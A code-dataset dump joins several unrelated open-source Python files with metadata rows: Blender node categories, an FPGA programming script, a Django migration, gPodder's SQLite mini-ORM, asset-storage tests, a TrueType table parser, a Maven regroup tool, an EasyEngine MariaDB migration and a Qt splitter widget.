NodeItem("CompositorNodeMapValue"),
NodeItem("CompositorNodeMapRange"),
NodeItem("CompositorNodeNormalize"),
NodeItem("CompositorNodeCurveVec"),
]),
CompositorNodeCategory("CMP_MATTE", "Matte", items=[
NodeItem("CompositorNodeKeying"),
NodeItem("CompositorNodeKeyingScreen"),
NodeItem("CompositorNodeChannelMatte"),
NodeItem("CompositorNodeColorSpill"),
NodeItem("CompositorNodeBoxMask"),
NodeItem("CompositorNodeEllipseMask"),
NodeItem("CompositorNodeLumaMatte"),
NodeItem("CompositorNodeDiffMatte"),
NodeItem("CompositorNodeDistanceMatte"),
NodeItem("CompositorNodeChromaMatte"),
NodeItem("CompositorNodeColorMatte"),
NodeItem("CompositorNodeDoubleEdgeMask"),
]),
CompositorNodeCategory("CMP_DISTORT", "Distort", items=[
NodeItem("CompositorNodeScale"),
NodeItem("CompositorNodeLensdist"),
NodeItem("CompositorNodeMovieDistortion"),
NodeItem("CompositorNodeTranslate"),
NodeItem("CompositorNodeRotate"),
NodeItem("CompositorNodeFlip"),
NodeItem("CompositorNodeCrop"),
NodeItem("CompositorNodeDisplace"),
NodeItem("CompositorNodeMapUV"),
NodeItem("CompositorNodeTransform"),
NodeItem("CompositorNodeStabilize"),
NodeItem("CompositorNodePlaneTrackDeform"),
NodeItem("CompositorNodeCornerPin"),
]),
CompositorNodeCategory("CMP_GROUP", "Group", items=node_group_items),
CompositorNodeCategory("CMP_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
NodeItem("CompositorNodeSwitch"),
]),
]
texture_node_categories = [
# Texture Nodes
TextureNodeCategory("TEX_INPUT", "Input", items=[
NodeItem("TextureNodeCurveTime"),
NodeItem("TextureNodeCoordinates"),
NodeItem("TextureNodeTexture"),
NodeItem("TextureNodeImage"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
TextureNodeCategory("TEX_OUTPUT", "Output", items=[
NodeItem("TextureNodeOutput"),
NodeItem("TextureNodeViewer"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
TextureNodeCategory("TEX_OP_COLOR", "Color", items=[
NodeItem("TextureNodeMixRGB"),
NodeItem("TextureNodeCurveRGB"),
NodeItem("TextureNodeInvert"),
NodeItem("TextureNodeHueSaturation"),
NodeItem("TextureNodeCompose"),
NodeItem("TextureNodeDecompose"),
]),
TextureNodeCategory("TEX_PATTERN", "Pattern", items=[
NodeItem("TextureNodeChecker"),
NodeItem("TextureNodeBricks"),
]),
TextureNodeCategory("TEX_TEXTURE", "Textures", items=[
NodeItem("TextureNodeTexNoise"),
NodeItem("TextureNodeTexDistNoise"),
NodeItem("TextureNodeTexClouds"),
NodeItem("TextureNodeTexBlend"),
NodeItem("TextureNodeTexVoronoi"),
NodeItem("TextureNodeTexMagic"),
NodeItem("TextureNodeTexMarble"),
NodeItem("TextureNodeTexWood"),
NodeItem("TextureNodeTexMusgrave"),
NodeItem("TextureNodeTexStucci"),
]),
TextureNodeCategory("TEX_CONVERTOR", "Converter", items=[
NodeItem("TextureNodeMath"),
NodeItem("TextureNodeValToRGB"),
NodeItem("TextureNodeRGBToBW"),
NodeItem("TextureNodeValToNor"),
NodeItem("TextureNodeDistance"),
]),
TextureNodeCategory("TEX_DISTORT", "Distort", items=[
NodeItem("TextureNodeScale"),
NodeItem("TextureNodeTranslate"),
NodeItem("TextureNodeRotate"),
NodeItem("TextureNodeAt"),
]),
TextureNodeCategory("TEX_GROUP", "Group", items=node_group_items),
TextureNodeCategory("TEX_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
]
def register():
nodeitems_utils.register_node_categories('SHADER', shader_node_categories)
nodeitems_utils.register_node_categories('COMPOSITING', compositor_node_categories)
nodeitems_utils.register_node_categories('TEXTURE', texture_node_categories)
def unregister():
nodeitems_utils.unregister_node_categories('SHADER')
nodeitems_utils.unregister_node_categories('COMPOSITING')
nodeitems_utils.unregister_node_categories('TEXTURE')
if __name__ == "__main__":
register()
| gpl-3.0 | 7,506,633,246,367,762,000 | 38.014374 | 98 | 0.667632 | false |
ska-sa/casperfpga | scripts/casperfpga_program.py | 1 | 1087 | #!/usr/bin/env python
__author__ = 'paulp'
import argparse
from casperfpga.casperfpga import CasperFpga
parser = argparse.ArgumentParser(
description='Program an FPGA.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(dest='hostname', type=str, action='store',
help='the hostname of the FPGA')
parser.add_argument(dest='fpgfile', type=str, action='store',
help='the FPG file to program')
parser.add_argument('--loglevel', dest='log_level', action='store', default='',
help='log level to use, default None, options INFO, '
'DEBUG, ERROR')
args = parser.parse_args()
if args.log_level != '':
import logging
log_level = args.log_level.strip()
try:
logging.basicConfig(level=eval('logging.%s' % log_level))
except AttributeError:
raise RuntimeError('No such log level: %s' % log_level)
# create the device and connect to it
fpga = CasperFpga(args.hostname, 7147)
fpga.upload_to_ram_and_program(args.fpgfile)
fpga.disconnect()
# end
| gpl-2.0 | -8,250,994,456,271,240,000 | 31.939394 | 79 | 0.658694 | false |
chmarr/prequelprizes | prizes/migrations/0002_auto__add_field_winner_authentication_ip__add_field_winner_details_ip.py | 1 | 2807 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Winner.authentication_ip'
db.add_column('prizes_winner', 'authentication_ip',
self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True),
keep_default=False)
# Adding field 'Winner.details_ip'
db.add_column('prizes_winner', 'details_ip',
self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Winner.authentication_ip'
db.delete_column('prizes_winner', 'authentication_ip')
# Deleting field 'Winner.details_ip'
db.delete_column('prizes_winner', 'details_ip')
models = {
'prizes.winner': {
'Meta': {'object_name': 'Winner'},
'address1': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'address2': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'authentication_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'authentication_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'creation_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'details_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'})
}
}
complete_apps = ['prizes'] | gpl-2.0 | -1,932,945,504,593,230,000 | 53 | 135 | 0.566441 | false |
gpodder/gpodder | src/gpodder/minidb.py | 1 | 7563 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# gPodder - A media aggregator and podcast client
# Copyright (c) 2005-2018 The gPodder Team
#
# gPodder is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# gPodder is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# gpodder.minidb - A simple SQLite store for Python objects
# Thomas Perl, 2010-01-28
# based on: "ORM wie eine Kirchenmaus - a very poor ORM implementation
# by thp, 2009-11-29 (thp.io/about)"
# This module is also available separately at:
# http://thp.io/2010/minidb/
# Import sqlite3, falling back to the pysqlite2 module where necessary
try:
import sqlite3.dbapi2 as sqlite
except ImportError:
try:
from pysqlite2 import dbapi2 as sqlite
except ImportError:
raise Exception('Please install SQLite3 support.')
import threading
class Store(object):
def __init__(self, filename=':memory:'):
self.db = sqlite.connect(filename, check_same_thread=False)
self.lock = threading.RLock()
def _schema(self, class_):
return class_.__name__, list(sorted(class_.__slots__))
def _set(self, o, slot, value):
# Set a slot on the given object to value, doing a cast if
# necessary. The value None is special-cased and never cast.
cls = o.__class__.__slots__[slot]
if value is not None:
if isinstance(value, bytes):
value = value.decode('utf-8')
value = cls(value)
setattr(o, slot, value)
def commit(self):
with self.lock:
self.db.commit()
def close(self):
with self.lock:
self.db.isolation_level = None
self.db.execute('VACUUM')
self.db.isolation_level = ''
self.db.close()
def _register(self, class_):
with self.lock:
table, slots = self._schema(class_)
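            # Create the table on first use; if it already exists, add a TEXT
            # column for every slot that is not yet present (a minimal,
            # additive schema migration).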
cur = self.db.execute('PRAGMA table_info(%s)' % table)
available = cur.fetchall()
if available:
available = [row[1] for row in available]
missing_slots = (s for s in slots if s not in available)
for slot in missing_slots:
self.db.execute('ALTER TABLE %s ADD COLUMN %s TEXT' % (table,
slot))
else:
self.db.execute('CREATE TABLE %s (%s)' % (table,
', '.join('%s TEXT' % s for s in slots)))
def convert(self, v):
if isinstance(v, str):
return v
        elif isinstance(v, bytes):
return v.decode('utf-8')
else:
return str(v)
def update(self, o, **kwargs):
self.remove(o)
for k, v in list(kwargs.items()):
setattr(o, k, v)
self.save(o)
def save(self, o):
if hasattr(o, '__iter__'):
klass = None
for child in o:
if klass is None:
klass = child.__class__
self._register(klass)
table, slots = self._schema(klass)
if not isinstance(child, klass):
raise ValueError('Only one type of object allowed')
used = [s for s in slots if getattr(child, s, None) is not None]
values = [self.convert(getattr(child, slot)) for slot in used]
self.db.execute('INSERT INTO %s (%s) VALUES (%s)' % (table,
', '.join(used), ', '.join('?' * len(used))), values)
return
with self.lock:
self._register(o.__class__)
table, slots = self._schema(o.__class__)
values = [self.convert(getattr(o, slot)) for slot in slots]
self.db.execute('INSERT INTO %s (%s) VALUES (%s)' % (table,
', '.join(slots), ', '.join('?' * len(slots))), values)
def delete(self, class_, **kwargs):
with self.lock:
self._register(class_)
table, slots = self._schema(class_)
sql = 'DELETE FROM %s' % (table,)
if kwargs:
sql += ' WHERE %s' % (' AND '.join('%s=?' % k for k in kwargs))
try:
self.db.execute(sql, list(kwargs.values()))
return True
except Exception as e:
return False
def remove(self, o):
if hasattr(o, '__iter__'):
for child in o:
self.remove(child)
return
with self.lock:
self._register(o.__class__)
table, slots = self._schema(o.__class__)
# Use "None" as wildcard selector in remove actions
slots = [s for s in slots if getattr(o, s, None) is not None]
values = [self.convert(getattr(o, slot)) for slot in slots]
self.db.execute('DELETE FROM %s WHERE %s' % (table,
' AND '.join('%s=?' % s for s in slots)), values)
def load(self, class_, **kwargs):
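        # Keyword arguments act as equality filters and are AND-ed together in
        # the WHERE clause; without kwargs every row of the table is returned.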
with self.lock:
self._register(class_)
table, slots = self._schema(class_)
sql = 'SELECT %s FROM %s' % (', '.join(slots), table)
if kwargs:
sql += ' WHERE %s' % (' AND '.join('%s=?' % k for k in kwargs))
try:
cur = self.db.execute(sql, list(kwargs.values()))
except Exception as e:
raise
def apply(row):
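                # Rebuild an instance without calling __init__, casting each
                # column back to its slot type; rows that fail a cast are
                # dropped from the result.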
o = class_.__new__(class_)
for attr, value in zip(slots, row):
try:
self._set(o, attr, value)
except ValueError as ve:
return None
return o
return [x for x in [apply(row) for row in cur] if x is not None]
def get(self, class_, **kwargs):
result = self.load(class_, **kwargs)
if result:
return result[0]
else:
return None
if __name__ == '__main__':
class Person(object):
__slots__ = {'username': str, 'id': int}
def __init__(self, username, id):
self.username = username
self.id = id
def __repr__(self):
return '<Person "%s" (%d)>' % (self.username, self.id)
m = Store()
m.save(Person('User %d' % x, x * 20) for x in range(50))
p = m.get(Person, id=200)
print(p)
m.remove(p)
p = m.get(Person, id=200)
# Remove some persons again (deletion by value!)
m.remove(Person('User %d' % x, x * 20) for x in range(40))
class Person(object):
__slots__ = {'username': str, 'id': int, 'mail': str}
def __init__(self, username, id, mail):
self.username = username
self.id = id
self.mail = mail
def __repr__(self):
return '<Person "%s" (%s)>' % (self.username, self.mail)
# A schema update takes place here
m.save(Person('User %d' % x, x * 20, 'user@home.com') for x in range(50))
print(m.load(Person))
| gpl-3.0 | 1,007,703,415,363,267,500 | 32.317181 | 81 | 0.526907 | false |
neoden/lagring | test/test.py | 1 | 6253 | import os
import pytest
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
INSTANCE_ROOT = ''
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://lagring:lagring@localhost:5432/lagring_test'
app.config['ASSET_STORAGE_ROOT'] = os.path.join(os.getcwd(), 'test/var/assets')
app.config['ASSET_URL_ROOT'] = '/assets'
db = SQLAlchemy(app)
core = None
entity_base = None
model = None
instance = None
storage = None
IMAGE_PATH = os.path.join(INSTANCE_ROOT, 'test/data/image.jpg')
DIR_PATH = os.path.join(INSTANCE_ROOT, 'test/data')
def test_core():
from lagring import LagringCore
global core
core = LagringCore(os.path.join(INSTANCE_ROOT, app.config['ASSET_STORAGE_ROOT']))
def test_model_definition():
from lagring import Entity, Asset
global entity_base
entity_base = Entity
entity_base.bind(core)
class A(db.Model, entity_base):
__tablename__ = 'test'
id = db.Column(db.Integer(), primary_key=True)
image = Asset()
directory = Asset()
global model
model = A
def test_entity_type():
from lagring import Entity, Asset
class B(db.Model, Entity):
__entitytype__ = 'special'
__tablename__ = 'regular'
id = db.Column(db.Integer(), primary_key=True)
image = Asset()
assert(B.entity_type == 'special')
def test_none_asset():
with app.app_context():
a = model(id=1)
assert(not a.image)
assert(not a.image.abs_path)
global instance
instance = a
def test_entity_id():
assert(instance.entity_id == 1)
def test_write_to_model_field():
with app.app_context():
instance.image = IMAGE_PATH
def test_get_path_from_model():
with app.app_context():
assert(os.path.isfile(instance.image.abs_path))
def test_write_metadata():
with app.app_context():
instance.image = IMAGE_PATH, {'width': 100, 'height': 80}
assert(instance.image.width == 100)
assert(instance.image.height == 80)
def test_write_stream():
with app.app_context():
instance.image = open(IMAGE_PATH, 'rb')
assert(os.path.isfile(instance.image.abs_path))
def test_delete_asset():
from lagring.asset import NoneAssetInstance
path = instance.image.abs_path
del instance.image
assert(isinstance(instance.image, NoneAssetInstance))
def test_write_directory():
with app.app_context():
instance.directory = DIR_PATH
assert(os.path.isdir(instance.directory.abs_path))
def test_iterassets():
with app.app_context():
instance.image = IMAGE_PATH
instance.directory = DIR_PATH
n = 0
assets = []
for asset, name in instance.iterassets():
n += 1
assets.append((asset, name))
assert(
os.path.isfile(asset.abs_path)
or
os.path.isdir(asset.abs_path)
)
assert(assets[0][1] in ('image', 'directory'))
assert(assets[1][1] in ('image', 'directory'))
assert(assets[0][1] != assets[1][1])
def test_flask_lagring():
from lagring import FlaskLagring
global storage
storage = FlaskLagring()
storage.init_app(app)
def test_image_asset_def():
from lagring.assets.image import ImageAsset
class D(db.Model, storage.Entity):
__tablename__ = 'test2'
id = db.Column(db.Integer(), primary_key=True)
image = ImageAsset(size=(100, 100))
image_no_process = ImageAsset()
global model
model = D
def test_image_asset():
with app.app_context():
a = model(id=1)
assert(not a.image)
assert(not a.image.abs_path)
global instance
instance = a
def test_image_no_process():
with app.app_context():
instance.image_no_process = IMAGE_PATH
assert(os.path.isfile(instance.image_no_process.abs_path))
def test_image_asset_write():
with app.app_context():
instance.image = IMAGE_PATH
assert(os.path.isfile(instance.image.abs_path))
assert(instance.image.width == 100)
assert(instance.image.height == 100)
def test_clone_assets():
a = model(id=1)
b = model(id=2)
a.image = IMAGE_PATH
storage.clone_assets(a, b)
assert(os.path.isfile(a.image.abs_path))
assert(os.path.isfile(b.image.abs_path))
def test_directory_asset_def():
from lagring.assets.directory import DirectoryAsset
class E(db.Model, storage.Entity):
__tablename__ = 'test3'
id = db.Column(db.Integer(), primary_key=True)
directory = DirectoryAsset()
global model
model = E
def test_directory_asset():
with app.app_context():
a = model(id=1)
assert(not a.directory)
assert(not a.directory.abs_path)
global instance
instance = a
def test_directory_asset_write_directory():
with app.app_context():
instance.directory = os.path.join(DIR_PATH, 'directory_asset')
assert(os.path.isdir(instance.directory.abs_path))
assert(os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
def test_directory_asset_write_zip():
with app.app_context():
b = model(id=2)
b.directory = os.path.join(DIR_PATH, 'image.jpg.zip')
assert(os.path.isdir(instance.directory.abs_path))
assert(os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
def test_directory_asset_write_invalid_zip():
from lagring import StorageException
with pytest.raises(StorageException) as excinfo:
with app.app_context():
c = model(id=3)
c.directory = os.path.join(DIR_PATH, 'image.jpg')
assert 'Valid zip-archive expected' in str(excinfo.value)
def test_directory_asset_write_zip_from_stream():
from werkzeug.datastructures import FileStorage
with app.app_context():
d = model(id=4)
with open(os.path.join(DIR_PATH, 'image.jpg.zip'), 'rb') as stream:
d.directory = FileStorage(stream, 'image.jpg.zip')
assert (os.path.isdir(instance.directory.abs_path))
assert (os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
| mit | 1,610,468,995,106,834,400 | 23.715415 | 98 | 0.629778 | false |
brechtm/rinohtype | src/rinoh/font/opentype/truetype.py | 1 | 1902 | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
import struct
from .parse import OpenTypeTable, short
class GlyfTable(OpenTypeTable):
"""Glyph outline table"""
tag = 'glyf'
def __init__(self, file, file_offset, loca_table):
super().__init__(file, file_offset)
self._file_offset = file_offset
for index, glyph_offset in enumerate(loca_table.offsets()):
if glyph_offset is not None:
self[index] = GlyphHeader(file, file_offset + glyph_offset)
# the glyph header is followed by the glyph description
class GlyphHeader(OpenTypeTable):
entries = [('numberOfContours', short),
('xMin', short),
('yMin', short),
('xMax', short),
('yMax', short)]
@property
def bounding_box(self):
return (self['xMin'], self['yMin'], self['xMax'], self['yMax'])
class LocaTable(OpenTypeTable):
"""Glyph location table"""
tag = 'loca'
def __init__(self, file, file_offset, version, num_glyphs):
super().__init__(file, file_offset)
self._num_glyphs = num_glyphs
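        # 'loca' version 0 stores 16-bit offsets that are half the actual byte
        # offset, while version 1 stores full 32-bit byte offsets.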
data_format = 'L' if version == 1 else 'H'
data_struct = struct.Struct('>{}{}'.format(num_glyphs + 1, data_format))
self._offsets = data_struct.unpack(file.read(data_struct.size))
if version == 0:
self._offsets = [offset * 2 for offset in self._offsets]
def offsets(self):
for index in range(self._num_glyphs):
offset = self._offsets[index]
if offset != self._offsets[index + 1]:
yield offset
else:
yield None
| agpl-3.0 | 1,037,244,954,149,980,400 | 31.793103 | 80 | 0.593586 | false |
pablooliveira/tigergrader | tigergrader/tests/test_plagiarism.py | 1 | 1342 | import unittest
import os
import shutil
from tigergrader.initdb import create_user
from testhelper import TestHelper
class PlagiarismTestCases(TestHelper):
def setUp(self):
TestHelper.setUp(self)
create_user('admin', 'admin@example.com', 'admintiger')
create_user('user1', 'user@example.com', 'usertiger')
create_user('user2', 'user@example.com', 'usertiger')
self.activate_submission("T1")
self.grade("jtiger-src.zip", "T1", user="user1")
self.grade("jtiger-src.zip", "T1", user="user2")
def test_plagiarism(self):
self.login('admin', 'admintiger')
rv = self.app.get('/admin', follow_redirects=True)
assert "3.0" in rv.data
assert "user1" in rv.data
assert "user2" in rv.data
rv = self.app.get('/plagiarism/T1', follow_redirects=True)
assert "user1" in rv.data
assert "user2" in rv.data
assert "/compare/T1/jtiger-src.zip/jtiger-src.zip/" in rv.data
rv = self.app.get('/compare/T1/jtiger-src.zip/jtiger-src.zip/',
follow_redirects=True)
assert "package jtiger.lexer" in rv.data
rv = self.app.get('/plagiarism/TWRONG', follow_redirects=True)
assert "Module does not seem to exist" in rv.data
if __name__ == '__main__':
unittest.main()
| mit | 8,271,417,888,378,298,000 | 32.55 | 71 | 0.622951 | false |
bjuvensjo/scripts | vang/maven/regroup.py | 1 | 2765 | #!/usr/bin/env python3
import argparse
from os import walk, rename, makedirs, listdir, rmdir
from os.path import join, sep
from sys import argv
from typing import Iterable, Callable
from vang.pio.rsr import _replace_in_file, _in
def file_content_replace_function(line: str, old: str, new: str) -> str:
line = line.replace(old, new)
line = line.replace(old.replace('.', sep), new.replace('.', sep))
# line = line.replace(f'<groupId>{old}</groupId>', f'<groupId>{new}</groupId>')
# line = line.replace(f'"{old}', f'"{new}')
# line = line.replace('{' + old, '{' + new)
# line = line.replace('<' + old, '<' + new)
# line = line.replace('=' + old, '=' + new)
# line = line.replace("='" + old, "='" + new)
# line = line.replace(old.replace('.', sep), new.replace('.', sep))
# line = sub(f'^package +{old}', f'package {new}', line)
# line = sub(f'^import +{old}', f'import {new}', line)
# line = sub(f'^import +static +{old}', f'import static {new}', line)
return line
def file_path_replace_function(file: str, old: str, new: str) -> str:
return file.replace(old.replace('.', sep), new.replace('.', sep))
def _replace_file(old: str, new: str, path: str, file: str, replace_function: Callable[[str, str, str], str]) -> None:
new_path = replace_function(path, old, new)
if new_path != path:
makedirs(new_path, exist_ok=True)
rename(join(path, file), join(new_path, file))
def _regroup(root: str, excludes: Iterable[str], old: str, new: str) -> None:
for dir_path, dir_names, files in walk(root, False):
if not any(_in(d, excludes) for d in dir_path.split(sep)):
for file in files:
if not _in(file, excludes):
_replace_in_file(old, new, join(dir_path, file), file_content_replace_function)
_replace_file(old, new, dir_path, file, file_path_replace_function)
for dir_name in dir_names:
if not listdir(join(dir_path, dir_name)):
rmdir(join(dir_path, dir_name))
def regroup(old: str, new: str, dirs: Iterable[str]) -> None:
for d in dirs:
_regroup(d, ['.git', '.gitignore', 'target'], old, new)
def main(old: str, new: str, dirs: Iterable[str]) -> None:
regroup(old, new, dirs)
def parse_args(args):
parser = argparse.ArgumentParser(
description='Change group for maven module, including package, all its imports and path references')
parser.add_argument('old', help='old group')
parser.add_argument('new', help='new group')
parser.add_argument('-d', '--dirs', nargs='*', default=['.'])
return parser.parse_args(args)
if __name__ == '__main__': # pragma: no cover
main(**parse_args(argv[1:]).__dict__)
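# Hypothetical usage sketch (group ids and directories are examples only):
#   python regroup.py com.acme.legacy com.acme.platform -d ./module-a ./module-b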
| apache-2.0 | 4,013,461,642,139,699,700 | 37.943662 | 118 | 0.600723 | false |
rjdp/Easynginedemoplugin | ee/cli/plugins/stack_migrate.py | 1 | 5213 | from cement.core.controller import CementBaseController, expose
from cement.core import handler, hook
from ee.core.mysql import EEMysql
from ee.core.logging import Log
from ee.core.variables import EEVariables
from ee.core.aptget import EEAptGet
from ee.core.shellexec import EEShellExec
from ee.core.apt_repo import EERepo
from ee.core.services import EEService
import configparser
import os
class EEStackMigrateController(CementBaseController):
class Meta:
label = 'migrate'
stacked_on = 'stack'
stacked_type = 'nested'
description = ('Migrate stack safely')
arguments = [
(['--mariadb'],
dict(help="Migrate database to MariaDB",
action='store_true')),
# (['--PHP'],
# dict(help="update to html site", action='store_true')),
]
@expose(hide=True)
def migrate_mariadb(self):
# Backup all database
EEMysql.backupAll(self)
# Add MariaDB repo
Log.info(self, "Adding repository for MariaDB, please wait ...")
mysql_pref = ("Package: *\nPin: origin mirror.aarnet.edu.au"
"\nPin-Priority: 1000\n")
with open('/etc/apt/preferences.d/'
'MariaDB.pref', 'w') as mysql_pref_file:
mysql_pref_file.write(mysql_pref)
EERepo.add(self, repo_url=EEVariables.ee_mysql_repo)
Log.debug(self, 'Adding key for {0}'
.format(EEVariables.ee_mysql_repo))
EERepo.add_key(self, '0xcbcb082a1bb943db',
keyserver="keyserver.ubuntu.com")
config = configparser.ConfigParser()
config.read(os.path.expanduser("~")+'/.my.cnf')
try:
chars = config['client']['password']
except Exception as e:
Log.error(self, "Error: process exited with error %s"
% e)
Log.debug(self, "Pre-seeding MariaDB")
Log.debug(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password "
"password \" | "
"debconf-set-selections")
EEShellExec.cmd_exec(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password "
"password {chars}\" | "
"debconf-set-selections"
.format(chars=chars),
log=False)
Log.debug(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password_again "
"password \" | "
"debconf-set-selections")
EEShellExec.cmd_exec(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password_again "
"password {chars}\" | "
"debconf-set-selections"
.format(chars=chars),
log=False)
# Install MariaDB
apt_packages = EEVariables.ee_mysql
# If PHP is installed then install php5-mysql
if EEAptGet.is_installed(self, "php5-fpm"):
apt_packages = apt_packages + ["php5-mysql"]
# If mail server is installed then install dovecot-sql and postfix-sql
if EEAptGet.is_installed(self, "dovecot-core"):
apt_packages = apt_packages + ["dovecot-mysql", "postfix-mysql",
"libclass-dbi-mysql-perl"]
Log.info(self, "Updating apt-cache, please wait ...")
EEAptGet.update(self)
Log.info(self, "Installing MariaDB, please wait ...")
EEAptGet.remove(self, ["mysql-common", "libmysqlclient18"])
EEAptGet.auto_remove(self)
EEAptGet.install(self, apt_packages)
# Restart dovecot and postfix if installed
if EEAptGet.is_installed(self, "dovecot-core"):
EEService.restart_service(self, 'dovecot')
EEService.restart_service(self, 'postfix')
@expose(hide=True)
def default(self):
        if not self.app.pargs.mariadb:
self.app.args.print_help()
if self.app.pargs.mariadb:
            if EEVariables.ee_mysql_host != "localhost":
Log.error(self, "Remote MySQL found, EasyEngine will not "
"install MariaDB")
if EEShellExec.cmd_exec(self, "mysqladmin ping") and (not
EEAptGet.is_installed(self, 'mariadb-server')):
Log.info(self, "If your database size is big, "
"migration may take some time.")
Log.info(self, "During migration non nginx-cached parts of "
"your site may remain down")
start_migrate = input("Type \"mariadb\" to continue:")
if start_migrate != "mariadb":
Log.error(self, "Not starting migration")
self.migrate_mariadb()
else:
Log.error(self, "Your current MySQL is not alive or "
"you allready installed MariaDB")
| mit | 3,222,771,789,004,413,400 | 41.040323 | 78 | 0.536735 | false |
FrodeSolheim/fs-uae-launcher | fswidgets/splitter.py | 1 | 4453 | import traceback
import weakref
from typing import List, Optional, cast
from typing_extensions import Literal
import fsui
from fsbc.util import unused
from fsui import Widget
from fsui.common.layout import HorizontalLayout, Layout, VerticalLayout
from fsui.qt.color import Color
from fsui.qt.drawingcontext import DrawingContext
from fsui.qt.qparent import QParent
from fsui.qt.qt import QPainter, Qt, QWidget
from fswidgets.overrides import overrides
from fswidgets.parentstack import ParentStack
from fswidgets.qt.core import Qt
from fswidgets.qt.widgets import QSplitter
from fswidgets.style import Style
from fswidgets.widget import Widget
from launcher.fswidgets2.style import Style
class Splitter(Widget):
HORIZONTAL = "HORIZONTAL"
VERTICAL = "VERTICAL"
def __init__(
self,
orientation: Literal["HORIZONTAL", "VERTICAL"] = HORIZONTAL,
*,
parent: Optional[Widget] = None
):
# __children Must be initialized early, because get_min_size can be
# called via the super constructor.
self.__children: List[Widget] = []
parent = parent or ParentStack.top()
super().__init__(
parent,
qwidget=QSplitter(
Qt.Horizontal
if orientation == self.HORIZONTAL
else Qt.Vertical,
QParent(parent),
),
)
# self.style = Style({}, style)
self.style = Style({})
self.layout = None
self.qwidget.setHandleWidth(0)
self.qwidget.setChildrenCollapsible(False)
if parent.layout is not None:
parent.layout.add(self, fill=True, expand=True)
self.__fixedIndex = 0
self.__horizontal = orientation == Splitter.HORIZONTAL
# FIXME: Implement
def get_min_height(self, width: int) -> int:
minHeight = 0
for child in self.__children:
if self.__horizontal:
minHeight = max(minHeight, child.get_min_height(width))
else:
minHeight += child.get_min_height(width)
return minHeight
# FIXME: Implement
def get_min_width(self) -> int:
# return super().get_min_width()
# return 100
minWidth = 0
for child in self.__children:
if self.__horizontal:
minWidth += child.get_min_width()
else:
minWidth = max(minWidth, child.get_min_width())
return minWidth
def getSplitterPosition(self):
sizes = self.qwidget.sizes()
if self.__fixedIndex == 0:
return sizes[0]
else:
return -sizes[1]
@overrides
def onChildAdded(self, widget: Widget):
super().onChildAdded(widget)
print("Splitter.onChildAdded", widget)
self.__children.append(widget)
# if len(self.__children) == 2:
# sizes: List[int] = []
# for child in self.__children:
# if self.__horizontal:
# sizes.append(child.get_min_width())
# print("setSizes", sizes)
# self.qwidget.setSizes(sizes)
@overrides
def onQWidgetChildAdded(self, qwidget: QWidget):
print("Splitter.onQWidgetChildAdded", qwidget)
def on_resize(self):
super().on_resize()
# FIXME: If the splitter is resized so that there is not room for the
# minimum size of one of the widgets, move the splitter position to
# account for this
pass
@property
def qwidget(self) -> QSplitter:
return cast(QSplitter, self.getQWidget())
def setSplitterPosition(self, position: int, zeroableIndex: int = 0):
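        # A positive position keeps the first pane at that size, a negative one
        # keeps the second pane at abs(position); zero collapses the pane given
        # by zeroableIndex.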
if position > 0:
self.qwidget.setStretchFactor(0, 0)
self.qwidget.setStretchFactor(1, 1)
self.qwidget.setSizes([position, 0])
self.__fixedIndex = 1
elif position < 0:
self.qwidget.setStretchFactor(0, 1)
self.qwidget.setStretchFactor(1, 0)
self.qwidget.setSizes([0, -position])
self.__fixedIndex = 0
else:
self.qwidget.setStretchFactor(zeroableIndex, 0)
self.qwidget.setStretchFactor(not zeroableIndex, 1)
self.qwidget.setSizes([0, 0])
